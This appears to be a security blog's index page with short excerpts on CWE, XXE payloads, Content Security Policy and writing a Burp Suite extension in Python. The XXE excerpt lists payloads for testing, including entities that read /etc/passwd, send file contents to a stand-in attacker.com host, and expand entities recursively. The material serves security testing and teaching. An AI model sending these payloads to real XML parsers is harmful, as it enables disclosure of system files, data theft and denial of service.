What is the Common Weakness Enumeration (CWE)?

Common Weakness Enumeration (CWE) is a system that identifies and categorizes common software and hardware vulnerabilities. It provides a standardized way of describing and categorizing these weaknesses, making it easier for developers, security analysts, and other professionals to understand, discuss, and address them. CWE was developed by the MITRE Corporation, a nonprofit organization that operates … Read more

Some XXE Payloads

Here are some common XXE payloads that can be used to test for XXE- <!DOCTYPE replace [<!ENTITY example “Hello World”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “file:///etc/passwd”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “ftp://username:password@ftp.example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://example.com/file”>]> <!DOCTYPE replace [<!ENTITY example SYSTEM “http://attacker.com/?data=%file_contents;”>]> <!DOCTYPE replace [<!ENTITY example “Hello &example2;”><!ENTITY example2 “&example;&example;&example;”>]> These payloads are … Read more

Content Security Policy

Content Security Policy (CSP) is a security measure that helps protect web applications from various attacks, including Cross-Site Scripting (XSS) and data injection. CSP works by specifying a set of Content Security Rules that dictate what resources are allowed to load on a page. This can be used to whitelist trusted sources of content, or … Read more

Writing a Basic Burp Extension in Python

Burp Suite is a popular web security testing tool that helps you secure web applications by testing and validating vulnerabilities. It’s a comprehensive platform for performing security assessments on web applications, and its extensibility is one of its key features. Burp Suite extensions are add-ons that allow you to customize and extend the functionality of … Read more